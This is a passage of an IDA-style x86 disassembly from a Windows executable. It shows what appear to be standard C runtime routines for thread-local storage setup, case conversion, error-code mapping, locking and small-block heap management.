; =============== S U B	R O U T	I N E =======================================



sub_405A8A	proc near		; DATA XREF: zcrshv4o:00422A24o
		mov	esi, [ebp+8]
sub_405A8A	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_405A8D	proc near		; CODE XREF: sub_405975+F5p
		push	0Ch
		call	sub_405EDF
		pop	ecx
		retn
sub_405A8D	endp


; =============== S U B	R O U T	I N E =======================================



sub_405A96	proc near		; CODE XREF: .text:loc_4045E5p
		push	edi
		push	offset aKernel32_dll ; "KERNEL32.DLL"
		call	ds:dword_41E0E0	; GetModuleHandleA
		mov	edi, eax
		test	edi, edi
		jnz	short loc_405AB1
		call	sub_4057E9
		xor	eax, eax
		pop	edi
		retn
; ---------------------------------------------------------------------------

loc_405AB1:				; CODE XREF: sub_405A96+10j
		push	esi
		mov	esi, ds:off_41E0E8
		push	offset dword_41E4F4
		push	edi
		call	esi ; sub_45000F
		push	offset aFlsgetvalue ; "FlsGetValue"
		push	edi
		mov	off_428924, eax
		call	esi ; sub_45000F
		push	offset aFlssetvalue ; "FlsSetValue"
		push	edi
		mov	off_428928, eax
		call	esi ; sub_45000F
		push	offset aFlsfree	; "FlsFree"
		push	edi
		mov	off_42892C, eax
		call	esi ; sub_45000F
		cmp	off_428924, 0
		mov	esi, ds:dword_41E178
		mov	off_428930, eax
		jz	short loc_405B11
		cmp	off_428928, 0
		jz	short loc_405B11
		cmp	off_42892C, 0
		jz	short loc_405B11
		test	eax, eax
		jnz	short loc_405B35

loc_405B11:				; CODE XREF: sub_405A96+63j
					; sub_405A96+6Cj ...
		mov	eax, ds:dword_41E180
		mov	off_428928, eax
		mov	eax, ds:off_41E174
		mov	off_428924, offset sub_4057B6
		mov	off_42892C, esi
		mov	off_428930, eax

loc_405B35:				; CODE XREF: sub_405A96+79j
		call	ds:dword_41E17C	; TlsAlloc
		cmp	eax, 0FFFFFFFFh
		mov	dword_42468C, eax
		jz	loc_405C15
		push	off_428928
		push	eax
		call	esi	; TlsSetValue
		test	eax, eax
		jz	loc_405C15
		call	sub_4080D9
		push	off_428924
		call	sub_4056E7
		push	off_428928
		mov	off_428924, eax
		call	sub_4056E7
		push	off_42892C
		mov	off_428928, eax
		call	sub_4056E7
		push	off_428930
		mov	off_42892C, eax
		call	sub_4056E7
		add	esp, 10h
		mov	off_428930, eax
		call	sub_405E41
		test	eax, eax
		jz	short loc_405C10
		push	offset sub_405975
		push	off_428924
		call	sub_405753
		pop	ecx
		call	eax	; TlsGetValue
		cmp	eax, 0FFFFFFFFh
		mov	dword_424688, eax
		jz	short loc_405C10
		push	214h
		push	1
		call	sub_407D3A
		mov	esi, eax
		test	esi, esi
		pop	ecx
		pop	ecx
		jz	short loc_405C10
		push	esi
		push	dword_424688
		push	off_42892C
		call	sub_405753
		pop	ecx
		call	eax	; TlsGetValue
		test	eax, eax
		jz	short loc_405C10
		push	0
		push	esi
		call	sub_405826
		pop	ecx
		pop	ecx
		call	ds:dword_41E0DC	; GetCurrentThreadId
		or	dword ptr [esi+4], 0FFFFFFFFh
		mov	[esi], eax
		xor	eax, eax
		inc	eax
		jmp	short loc_405C17
; ---------------------------------------------------------------------------

loc_405C10:				; CODE XREF: sub_405A96+113j
					; sub_405A96+130j ...
		call	sub_4057E9

loc_405C15:				; CODE XREF: sub_405A96+ADj
					; sub_405A96+BEj
		xor	eax, eax

loc_405C17:				; CODE XREF: sub_405A96+178j
		pop	esi
		pop	edi
		retn
sub_405A96	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405C1A	proc near		; CODE XREF: sub_402D64+9Bp
					; sub_402D64+ADp ...

var_18		= dword	ptr -18h
var_10		= dword	ptr -10h
var_C		= byte ptr -0Ch
var_8		= byte ptr -8
var_7		= byte ptr -7
var_4		= byte ptr -4
var_3		= byte ptr -3
var_2		= byte ptr -2
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		push	ebx
		push	esi
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_18]
		call	sub_402CAD
		mov	ebx, [ebp+arg_0]
		mov	esi, 100h
		cmp	ebx, esi
		jnb	short loc_405C8D
		mov	ecx, [ebp+var_18]
		cmp	dword ptr [ecx+0ACh], 1
		jle	short loc_405C59
		lea	eax, [ebp+var_18]
		push	eax
		push	1
		push	ebx
		call	sub_40D004
		mov	ecx, [ebp+var_18]
		add	esp, 0Ch
		jmp	short loc_405C66
; ---------------------------------------------------------------------------

loc_405C59:				; CODE XREF: sub_405C1A+29j
		mov	eax, [ecx+0C8h]
		movzx	eax, byte ptr [eax+ebx*2]
		and	eax, 1

loc_405C66:				; CODE XREF: sub_405C1A+3Dj
		test	eax, eax
		jz	short loc_405C79
		mov	eax, [ecx+0CCh]
		movzx	eax, byte ptr [eax+ebx]
		jmp	loc_405D20
; ---------------------------------------------------------------------------

loc_405C79:				; CODE XREF: sub_405C1A+4Ej
					; sub_405C1A+EAj
		cmp	[ebp+var_C], 0
		jz	short loc_405C86
		mov	eax, [ebp+var_10]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_405C86:				; CODE XREF: sub_405C1A+63j
		mov	eax, ebx
		jmp	loc_405D2D
; ---------------------------------------------------------------------------

loc_405C8D:				; CODE XREF: sub_405C1A+1Dj
		mov	eax, [ebp+var_18]
		cmp	dword ptr [eax+0ACh], 1
		jle	short loc_405CCA
		mov	[ebp+arg_0], ebx
		sar	[ebp+arg_0], 8
		lea	eax, [ebp+var_18]
		push	eax
		mov	eax, [ebp+arg_0]
		and	eax, 0FFh
		push	eax
		call	sub_40CFC0
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_405CCA
		mov	al, byte ptr [ebp+arg_0]
		push	2
		mov	[ebp+var_4], al
		mov	[ebp+var_3], bl
		mov	[ebp+var_2], 0
		pop	ecx
		jmp	short loc_405CDF
; ---------------------------------------------------------------------------

loc_405CCA:				; CODE XREF: sub_405C1A+7Dj
					; sub_405C1A+9Cj
		call	sub_405D93
		mov	dword ptr [eax], 2Ah
		xor	ecx, ecx
		mov	[ebp+var_4], bl
		mov	[ebp+var_3], 0
		inc	ecx

loc_405CDF:				; CODE XREF: sub_405C1A+AEj
		mov	eax, [ebp+var_18]
		push	1
		push	dword ptr [eax+4]
		lea	edx, [ebp+var_8]
		push	3
		push	edx
		push	ecx
		lea	ecx, [ebp+var_4]
		push	ecx
		push	esi
		push	dword ptr [eax+14h]
		lea	eax, [ebp+var_18]
		push	eax
		call	sub_40C8B9
		add	esp, 24h
		test	eax, eax
		jz	loc_405C79
		cmp	eax, 1
		jnz	short loc_405D15
		movzx	eax, [ebp+var_8]
		jmp	short loc_405D20
; ---------------------------------------------------------------------------

loc_405D15:				; CODE XREF: sub_405C1A+F3j
		movzx	ecx, [ebp+var_7]
		xor	eax, eax
		mov	ah, [ebp+var_8]
		or	eax, ecx

loc_405D20:				; CODE XREF: sub_405C1A+5Aj
					; sub_405C1A+F9j
		cmp	[ebp+var_C], 0
		jz	short loc_405D2D
		mov	ecx, [ebp+var_10]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

loc_405D2D:				; CODE XREF: sub_405C1A+6Ej
					; sub_405C1A+10Aj
		pop	esi
		pop	ebx
		leave
		retn
sub_405C1A	endp


; =============== S U B	R O U T	I N E =======================================



sub_405D31	proc near		; CODE XREF: sub_410E7D+19p
					; sub_410E7D+36p

arg_0		= dword	ptr  4

		cmp	dword_428900, 0
		jnz	short loc_405D4A
		mov	eax, [esp+arg_0]
		lea	ecx, [eax-41h]
		cmp	ecx, 19h
		ja	short locret_405D57
		add	eax, 20h
		retn
; ---------------------------------------------------------------------------

loc_405D4A:				; CODE XREF: sub_405D31+7j
		push	0
		push	[esp+4+arg_0]
		call	sub_405C1A
		pop	ecx
		pop	ecx

locret_405D57:				; CODE XREF: sub_405D31+13j
		retn
sub_405D31	endp


; =============== S U B	R O U T	I N E =======================================



sub_405D58	proc near		; CODE XREF: sub_403B91+80p
					; sub_405DB9+Dp ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		xor	ecx, ecx

loc_405D5E:				; CODE XREF: sub_405D58+13j
		cmp	eax, dword_424690[ecx*8]
		jz	short loc_405D79
		inc	ecx
		cmp	ecx, 2Dh
		jl	short loc_405D5E
		lea	ecx, [eax-13h]
		cmp	ecx, 11h
		ja	short loc_405D81
		push	0Dh
		pop	eax
		retn
; ---------------------------------------------------------------------------

loc_405D79:				; CODE XREF: sub_405D58+Dj
		mov	eax, dword_424694[ecx*8]
		retn
; ---------------------------------------------------------------------------

loc_405D81:				; CODE XREF: sub_405D58+1Bj
		add	eax, 0FFFFFF44h
		push	0Eh
		pop	ecx
		cmp	ecx, eax
		sbb	eax, eax
		and	eax, ecx
		add	eax, 8
		retn
sub_405D58	endp


; =============== S U B	R O U T	I N E =======================================



sub_405D93	proc near		; CODE XREF: sub_402D64+19p
					; sub_402D64+4Fp ...
		call	sub_4058DA
		test	eax, eax
		jnz	short loc_405DA2
		mov	eax, offset dword_4247F8
		retn
; ---------------------------------------------------------------------------

loc_405DA2:				; CODE XREF: sub_405D93+7j
		add	eax, 8
		retn
sub_405D93	endp


; =============== S U B	R O U T	I N E =======================================



sub_405DA6	proc near		; CODE XREF: sub_405DB9+1p
					; sub_4090A1+14p ...
		call	sub_4058DA
		test	eax, eax
		jnz	short loc_405DB5
		mov	eax, offset dword_4247FC
		retn
; ---------------------------------------------------------------------------

loc_405DB5:				; CODE XREF: sub_405DA6+7j
		add	eax, 0Ch
		retn
sub_405DA6	endp


; =============== S U B	R O U T	I N E =======================================



sub_405DB9	proc near		; CODE XREF: sub_40900D+84p
					; sub_40A36D+3FBp ...

arg_0		= dword	ptr  4

		push	esi
		call	sub_405DA6
		mov	ecx, [esp+4+arg_0]
		push	ecx
		mov	[eax], ecx
		call	sub_405D58
		pop	ecx
		mov	esi, eax
		call	sub_405D93
		mov	[eax], esi
		pop	esi
		retn
sub_405DB9	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405DE0	proc near		; CODE XREF: sub_402E87+9Ap
					; sub_402F77+42j

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	edi
		push	esi
		push	ebx
		mov	ecx, [ebp+arg_8]
		or	ecx, ecx
		jz	short loc_405E3A
		mov	esi, [ebp+arg_0]
		mov	edi, [ebp+arg_4]
		mov	bh, 41h
		mov	bl, 5Ah
		mov	dh, 20h
		lea	ecx, [ecx+0]

loc_405DFC:				; CODE XREF: sub_405DE0+49j
		mov	ah, [esi]
		or	ah, ah
		mov	al, [edi]
		jz	short loc_405E2B
		or	al, al
		jz	short loc_405E2B
		add	esi, 1
		add	edi, 1
		cmp	ah, bh
		jb	short loc_405E18
		cmp	ah, bl
		ja	short loc_405E18
		add	ah, dh

loc_405E18:				; CODE XREF: sub_405DE0+30j
					; sub_405DE0+34j
		cmp	al, bh
		jb	short loc_405E22
		cmp	al, bl
		ja	short loc_405E22
		add	al, dh

loc_405E22:				; CODE XREF: sub_405DE0+3Aj
					; sub_405DE0+3Ej
		cmp	ah, al
		jnz	short loc_405E31
		sub	ecx, 1
		jnz	short loc_405DFC

loc_405E2B:				; CODE XREF: sub_405DE0+22j
					; sub_405DE0+26j
		xor	ecx, ecx
		cmp	ah, al
		jz	short loc_405E3A

loc_405E31:				; CODE XREF: sub_405DE0+44j
		mov	ecx, 0FFFFFFFFh
		jb	short loc_405E3A
		neg	ecx

loc_405E3A:				; CODE XREF: sub_405DE0+Bj
					; sub_405DE0+4Fj ...
		mov	eax, ecx
		pop	ebx
		pop	esi
		pop	edi
		leave
		retn
sub_405DE0	endp


; =============== S U B	R O U T	I N E =======================================



sub_405E41	proc near		; CODE XREF: sub_405A96+10Cp
		push	esi
		push	edi
		xor	esi, esi
		mov	edi, offset dword_428938

loc_405E4A:				; CODE XREF: sub_405E41+35j
		cmp	dword_424804[esi*8], 1
		jnz	short loc_405E72
		lea	eax, ds:424800h[esi*8]
		mov	[eax], edi
		push	0FA0h
		push	dword ptr [eax]
		add	edi, 18h
		call	sub_40D0D4
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_405E7E

loc_405E72:				; CODE XREF: sub_405E41+11j
		inc	esi
		cmp	esi, 24h
		jl	short loc_405E4A
		xor	eax, eax
		inc	eax

loc_405E7B:				; CODE XREF: sub_405E41+47j
		pop	edi
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_405E7E:				; CODE XREF: sub_405E41+2Fj
		and	off_424800[esi*8], 0
		xor	eax, eax
		jmp	short loc_405E7B
sub_405E41	endp


; =============== S U B	R O U T	I N E =======================================



sub_405E8A	proc near		; CODE XREF: sub_4057E9:loc_405821j
		push	ebx
		mov	ebx, ds:off_41E16C
		push	esi
		mov	esi, offset off_424800
		push	edi

loc_405E98:				; CODE XREF: sub_405E8A+30j
		mov	edi, [esi]
		test	edi, edi
		jz	short loc_405EB1
		cmp	dword ptr [esi+4], 1
		jz	short loc_405EB1
		push	edi
		call	ebx ; sub_445FD0
		push	edi
		call	sub_403B91
		and	dword ptr [esi], 0
		pop	ecx

loc_405EB1:				; CODE XREF: sub_405E8A+12j
					; sub_405E8A+18j
		add	esi, 8
		cmp	esi, offset dword_424920
		jl	short loc_405E98
		mov	esi, offset off_424800
		pop	edi

loc_405EC2:				; CODE XREF: sub_405E8A+50j
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_405ED1
		cmp	dword ptr [esi+4], 1
		jnz	short loc_405ED1
		push	eax
		call	ebx ; sub_445FD0

loc_405ED1:				; CODE XREF: sub_405E8A+3Cj
					; sub_405E8A+42j
		add	esi, 8
		cmp	esi, offset dword_424920
		jl	short loc_405EC2
		pop	esi
		pop	ebx
		retn
sub_405E8A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405EDF	proc near		; CODE XREF: sub_40306D+2p
					; sub_403BE7+2p ...

arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_0]
		push	off_424800[eax*8]
		call	ds:dword_41E168	; RtlLeaveCriticalSection
		pop	ebp
		retn
sub_405EDF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405EF4	proc near		; CODE XREF: sub_405FB7+14p
					; sub_408A61+4Fp ...

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	0Ch
		push	offset dword_422A28
		call	__SEH_prolog4
		xor	edi, edi
		inc	edi
		mov	[ebp+var_1C], edi
		xor	ebx, ebx
		cmp	dword_428A88, ebx
		jnz	short loc_405F28
		call	sub_40A214
		push	1Eh
		call	sub_40A074
		push	0FFh
		call	sub_407E67
		pop	ecx
		pop	ecx

loc_405F28:				; CODE XREF: sub_405EF4+1Aj
		mov	esi, [ebp+arg_0]
		lea	esi, ds:424800h[esi*8]
		cmp	[esi], ebx
		jz	short loc_405F3A
		mov	eax, edi
		jmp	short loc_405FA8
; ---------------------------------------------------------------------------

loc_405F3A:				; CODE XREF: sub_405EF4+40j
		push	18h
		call	sub_407CFA
		pop	ecx
		mov	edi, eax
		cmp	edi, ebx
		jnz	short loc_405F57
		call	sub_405D93
		mov	dword ptr [eax], 0Ch
		xor	eax, eax
		jmp	short loc_405FA8
; ---------------------------------------------------------------------------

loc_405F57:				; CODE XREF: sub_405EF4+52j
		push	0Ah
		call	sub_405FB7
		pop	ecx
		mov	[ebp+ms_exc.disabled], ebx
		cmp	[esi], ebx
		jnz	short loc_405F92
		push	0FA0h
		push	edi
		call	sub_40D0D4
		pop	ecx
		pop	ecx
		test	eax, eax
		jnz	short loc_405F8E
		push	edi
		call	sub_403B91
		pop	ecx
		call	sub_405D93
		mov	dword ptr [eax], 0Ch
		mov	[ebp+var_1C], ebx
		jmp	short loc_405F99
; ---------------------------------------------------------------------------

loc_405F8E:				; CODE XREF: sub_405EF4+81j
		mov	[esi], edi
		jmp	short loc_405F99
; ---------------------------------------------------------------------------

loc_405F92:				; CODE XREF: sub_405EF4+70j
		push	edi
		call	sub_403B91
		pop	ecx

loc_405F99:				; CODE XREF: sub_405EF4+98j
					; sub_405EF4+9Cj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_405FAE
		mov	eax, [ebp+var_1C]

loc_405FA8:				; CODE XREF: sub_405EF4+44j
					; sub_405EF4+61j
		call	__SEH_epilog4
		retn
sub_405EF4	endp


; =============== S U B	R O U T	I N E =======================================



sub_405FAE	proc near		; CODE XREF: sub_405EF4+ACp
					; DATA XREF: zcrshv4o:00422A40o
		push	0Ah
		call	sub_405EDF
		pop	ecx
		retn
sub_405FAE	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405FB7	proc near		; CODE XREF: sub_402FD3+44p
					; sub_403B91+1Ep ...

arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_0]
		push	esi
		lea	esi, ds:424800h[eax*8]
		cmp	dword ptr [esi], 0
		jnz	short loc_405FDD
		push	eax
		call	sub_405EF4
		test	eax, eax
		pop	ecx
		jnz	short loc_405FDD
		push	11h
		call	sub_407E1D
		pop	ecx

loc_405FDD:				; CODE XREF: sub_405FB7+11j
					; sub_405FB7+1Cj
		push	dword ptr [esi]
		call	ds:dword_41E164	; RtlEnterCriticalSection
		pop	esi
		pop	ebp
		retn
sub_405FB7	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405FE8	proc near		; CODE XREF: sub_406043:loc_406066p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	esi
		lea	eax, [ebp+var_4]
		xor	esi, esi
		push	eax
		mov	[ebp+var_4], esi
		mov	[ebp+var_8], esi
		call	sub_407EC6
		test	eax, eax
		pop	ecx
		jz	short loc_406011
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4033CB
		add	esp, 14h

loc_406011:				; CODE XREF: sub_405FE8+1Aj
		lea	eax, [ebp+var_8]
		push	eax
		call	sub_407EFD
		test	eax, eax
		pop	ecx
		jz	short loc_40602C
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4033CB
		add	esp, 14h

loc_40602C:				; CODE XREF: sub_405FE8+35j
		cmp	[ebp+var_4], 2
		pop	esi
		jnz	short loc_40603E
		cmp	[ebp+var_8], 5
		jb	short loc_40603E
		xor	eax, eax
		inc	eax
		leave
		retn
; ---------------------------------------------------------------------------

loc_40603E:				; CODE XREF: sub_405FE8+49j
					; sub_405FE8+4Fj
		push	3
		pop	eax
		leave
		retn
sub_405FE8	endp


; =============== S U B	R O U T	I N E =======================================



sub_406043	proc near		; CODE XREF: .text:004045D3p

arg_0		= dword	ptr  4

		xor	eax, eax
		cmp	[esp+arg_0], eax
		push	0
		setz	al
		push	1000h
		push	eax
		call	ds:dword_41E15C	; HeapCreate
		test	eax, eax
		mov	dword_428A88, eax
		jnz	short loc_406066

loc_406063:				; CODE XREF: sub_406043+54j
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_406066:				; CODE XREF: sub_406043+1Ej
		call	sub_405FE8
		cmp	eax, 3
		mov	dword_439014, eax
		jnz	short loc_406099
		push	3F8h
		call	sub_40609D
		test	eax, eax
		pop	ecx
		jnz	short loc_406099
		push	dword_428A88
		call	ds:off_41E160
		and	dword_428A88, 0
		jmp	short loc_406063
; ---------------------------------------------------------------------------

loc_406099:				; CODE XREF: sub_406043+30j
					; sub_406043+3Fj
		xor	eax, eax
		inc	eax
		retn
sub_406043	endp


; =============== S U B	R O U T	I N E =======================================



sub_40609D	proc near		; CODE XREF: sub_406043+37p

arg_0		= dword	ptr  4

		push	140h
		push	0
		push	dword_428A88
		call	ds:dword_41E110	; RtlAllocateHeap
		test	eax, eax
		mov	dword_439000, eax
		jnz	short loc_4060BA
		retn
; ---------------------------------------------------------------------------

loc_4060BA:				; CODE XREF: sub_40609D+1Aj
		mov	ecx, [esp+arg_0]
		and	dword_428A8C, 0
		and	dword_438FFC, 0
		mov	dword_439008, eax
		xor	eax, eax
		mov	dword_439004, ecx
		mov	dword_43900C, 10h
		inc	eax
		retn
sub_40609D	endp


; =============== S U B	R O U T	I N E =======================================



sub_4060E5	proc near		; CODE XREF: sub_402FD3+4Ep
					; sub_403B91+29p ...

arg_0		= dword	ptr  4

		mov	ecx, dword_438FFC
		mov	eax, dword_439000
		imul	ecx, 14h
		add	ecx, eax
		jmp	short loc_406109
; ---------------------------------------------------------------------------

loc_4060F7:				; CODE XREF: sub_4060E5+26j
		mov	edx, [esp+arg_0]
		sub	edx, [eax+0Ch]
		cmp	edx, 100000h
		jb	short locret_40610F
		add	eax, 14h

loc_406109:				; CODE XREF: sub_4060E5+10j
		cmp	eax, ecx
		jb	short loc_4060F7
		xor	eax, eax

locret_40610F:				; CODE XREF: sub_4060E5+1Fj
		retn
sub_4060E5	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_406110	proc near		; CODE XREF: sub_403B91+38p
					; sub_40E02D+B5p ...

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	ecx, [ebp+arg_0]
		mov	eax, [ecx+10h]
		push	esi
		mov	esi, [ebp+arg_4]
		push	edi
		mov	edi, esi
		sub	edi, [ecx+0Ch]
		add	esi, 0FFFFFFFCh
		shr	edi, 0Fh
		mov	ecx, edi
		imul	ecx, 204h
		lea	ecx, [ecx+eax+144h]
		mov	[ebp+var_10], ecx
		mov	ecx, [esi]
		dec	ecx
		test	cl, 1
		mov	[ebp+var_4], ecx
		jnz	loc_406420
		push	ebx
		lea	ebx, [ecx+esi]
		mov	edx, [ebx]
		mov	[ebp+var_C], edx
		mov	edx, [esi-4]
		mov	[ebp+var_8], edx
		mov	edx, [ebp+var_C]
		test	dl, 1
		mov	[ebp+arg_4], ebx
		jnz	short loc_4061DB
		sar	edx, 4
		dec	edx
		cmp	edx, 3Fh
		jbe	short loc_406173
		push	3Fh
		pop	edx

loc_406173:				; CODE XREF: sub_406110+5Ej
		mov	ecx, [ebx+4]
		cmp	ecx, [ebx+8]
		jnz	short loc_4061BD
		cmp	edx, 20h
		mov	ebx, 80000000h
		jnb	short loc_40619E
		mov	ecx, edx
		shr	ebx, cl
		lea	ecx, [edx+eax+4]
		not	ebx
		and	[eax+edi*4+44h], ebx
		dec	byte ptr [ecx]
		jnz	short loc_4061BA
		mov	ecx, [ebp+arg_0]
		and	[ecx], ebx
		jmp	short loc_4061BA
; ---------------------------------------------------------------------------

loc_40619E:				; CODE XREF: sub_406110+73j
		lea	ecx, [edx-20h]
		shr	ebx, cl
		lea	ecx, [edx+eax+4]
		not	ebx
		and	[eax+edi*4+0C4h], ebx
		dec	byte ptr [ecx]
		jnz	short loc_4061BA
		mov	ecx, [ebp+arg_0]
		and	[ecx+4], ebx

loc_4061BA:				; CODE XREF: sub_406110+85j
					; sub_406110+8Cj ...
		mov	ebx, [ebp+arg_4]

loc_4061BD:				; CODE XREF: sub_406110+69j
		mov	edx, [ebx+8]
		mov	ebx, [ebx+4]
		mov	ecx, [ebp+var_4]
		add	ecx, [ebp+var_C]
		mov	[edx+4], ebx
		mov	edx, [ebp+arg_4]
		mov	ebx, [edx+4]
		mov	edx, [edx+8]
		mov	[ebx+8], edx
		mov	[ebp+var_4], ecx

loc_4061DB:				; CODE XREF: sub_406110+55j
		mov	edx, ecx
		sar	edx, 4
		dec	edx
		cmp	edx, 3Fh
		jbe	short loc_4061E9
		push	3Fh
		pop	edx

loc_4061E9:				; CODE XREF: sub_406110+D4j
		mov	ebx, [ebp+var_8]
		and	ebx, 1
		mov	[ebp+var_C], ebx
		jnz	loc_406287
		sub	esi, [ebp+var_8]
		mov	ebx, [ebp+var_8]
		sar	ebx, 4
		push	3Fh
		mov	[ebp+arg_4], esi
		dec	ebx
		pop	esi
		cmp	ebx, esi
		jbe	short loc_40620E
		mov	ebx, esi

loc_40620E:				; CODE XREF: sub_406110+FAj
		add	ecx, [ebp+var_8]
		mov	edx, ecx
		sar	edx, 4
		dec	edx
		cmp	edx, esi
		mov	[ebp+var_4], ecx
		jbe	short loc_406220
		mov	edx, esi

loc_406220:				; CODE XREF: sub_406110+10Cj
		cmp	ebx, edx
		jz	short loc_406282
		mov	ecx, [ebp+arg_4]
		mov	esi, [ecx+4]
		cmp	esi, [ecx+8]
		jnz	short loc_40626A
		cmp	ebx, 20h
		mov	esi, 80000000h
		jnb	short loc_406250
		mov	ecx, ebx
		shr	esi, cl
		not	esi
		and	[eax+edi*4+44h], esi
		dec	byte ptr [ebx+eax+4]
		jnz	short loc_40626A
		mov	ecx, [ebp+arg_0]
		and	[ecx], esi
		jmp	short loc_40626A
; ---------------------------------------------------------------------------

loc_406250:				; CODE XREF: sub_406110+127j
		lea	ecx, [ebx-20h]
		shr	esi, cl
		not	esi
		and	[eax+edi*4+0C4h], esi
		dec	byte ptr [ebx+eax+4]
		jnz	short loc_40626A
		mov	ecx, [ebp+arg_0]
		and	[ecx+4], esi

loc_40626A:				; CODE XREF: sub_406110+11Dj
					; sub_406110+137j ...
		mov	ecx, [ebp+arg_4]
		mov	esi, [ecx+8]
		mov	ecx, [ecx+4]
		mov	[esi+4], ecx
		mov	ecx, [ebp+arg_4]
		mov	esi, [ecx+4]
		mov	ecx, [ecx+8]
		mov	[esi+8], ecx

loc_406282:				; CODE XREF: sub_406110+112j
		mov	esi, [ebp+arg_4]
		jmp	short loc_40628A
; ---------------------------------------------------------------------------

loc_406287:				; CODE XREF: sub_406110+E2j
		mov	ebx, [ebp+arg_0]

loc_40628A:				; CODE XREF: sub_406110+175j
		cmp	[ebp+var_C], 0
		jnz	short loc_406298
		cmp	ebx, edx
		jz	loc_406318

loc_406298:				; CODE XREF: sub_406110+17Ej
		mov	ecx, [ebp+var_10]
		lea	ecx, [ecx+edx*8]
		mov	ebx, [ecx+4]
		mov	[esi+8], ecx
		mov	[esi+4], ebx
		mov	[ecx+4], esi
		mov	ecx, [esi+4]
		mov	[ecx+8], esi
		mov	ecx, [esi+4]
		cmp	ecx, [esi+8]
		jnz	short loc_406318
		mov	cl, [edx+eax+4]
		mov	byte ptr [ebp+arg_4+3],	cl
		inc	cl
		cmp	edx, 20h
		mov	[edx+eax+4], cl
		jnb	short loc_4062EF
		cmp	byte ptr [ebp+arg_4+3],	0
		jnz	short loc_4062DE
		mov	ecx, edx
		mov	ebx, 80000000h
		shr	ebx, cl
		mov	ecx, [ebp+arg_0]
		or	[ecx], ebx

loc_4062DE:				; CODE XREF: sub_406110+1BEj
		mov	ebx, 80000000h
		mov	ecx, edx
		shr	ebx, cl
		lea	eax, [eax+edi*4+44h]
		or	[eax], ebx
		jmp	short loc_406318
; ---------------------------------------------------------------------------

loc_4062EF:				; CODE XREF: sub_406110+1B8j
		cmp	byte ptr [ebp+arg_4+3],	0
		jnz	short loc_406305
		lea	ecx, [edx-20h]
		mov	ebx, 80000000h
		shr	ebx, cl
		mov	ecx, [ebp+arg_0]
		or	[ecx+4], ebx

loc_406305:				; CODE XREF: sub_406110+1E3j
		lea	ecx, [edx-20h]
		mov	edx, 80000000h
		shr	edx, cl
		lea	eax, [eax+edi*4+0C4h]
		or	[eax], edx

loc_406318:				; CODE XREF: sub_406110+182j
					; sub_406110+1A6j ...
		mov	eax, [ebp+var_4]
		mov	[esi], eax
		mov	[eax+esi-4], eax
		mov	eax, [ebp+var_10]
		dec	dword ptr [eax]
		jnz	loc_40641F
		mov	eax, dword_428A8C
		test	eax, eax
		jz	loc_406411
		mov	ecx, dword_439010
		mov	esi, ds:off_41E158
		push	4000h
		shl	ecx, 0Fh
		add	ecx, [eax+0Ch]
		mov	ebx, 8000h
		push	ebx
		push	ecx
		call	esi ; sub_458658
		mov	ecx, dword_439010
		mov	eax, dword_428A8C
		mov	edx, 80000000h
		shr	edx, cl
		or	[eax+8], edx
		mov	eax, dword_428A8C
		mov	eax, [eax+10h]
		mov	ecx, dword_439010
		and	dword ptr [eax+ecx*4+0C4h], 0
		mov	eax, dword_428A8C
		mov	eax, [eax+10h]
		dec	byte ptr [eax+43h]
		mov	eax, dword_428A8C
		mov	ecx, [eax+10h]
		cmp	byte ptr [ecx+43h], 0
		jnz	short loc_4063A6
		and	dword ptr [eax+4], 0FFFFFFFEh
		mov	eax, dword_428A8C

loc_4063A6:				; CODE XREF: sub_406110+28Bj
		cmp	dword ptr [eax+8], 0FFFFFFFFh
		jnz	short loc_406411
		push	ebx
		push	0
		push	dword ptr [eax+0Ch]
		call	esi ; sub_458658
		mov	eax, dword_428A8C
		push	dword ptr [eax+10h]
		push	0
		push	dword_428A88
		call	ds:dword_41E108	; RtlFreeHeap
		mov	ecx, dword_438FFC
		mov	eax, dword_428A8C
		imul	ecx, 14h
		mov	edx, dword_439000
		sub	ecx, eax
		lea	ecx, [ecx+edx-14h]
		push	ecx
		lea	ecx, [eax+14h]
		push	ecx
		push	eax
		call	sub_407930
		mov	eax, [ebp+arg_0]
		add	esp, 0Ch
		dec	dword_438FFC
		cmp	eax, dword_428A8C
		jbe	short loc_406407
		sub	[ebp+arg_0], 14h

loc_406407:				; CODE XREF: sub_406110+2F1j
		mov	eax, dword_439000
		mov	dword_439008, eax

loc_406411:				; CODE XREF: sub_406110+223j
					; sub_406110+29Aj
		mov	eax, [ebp+arg_0]
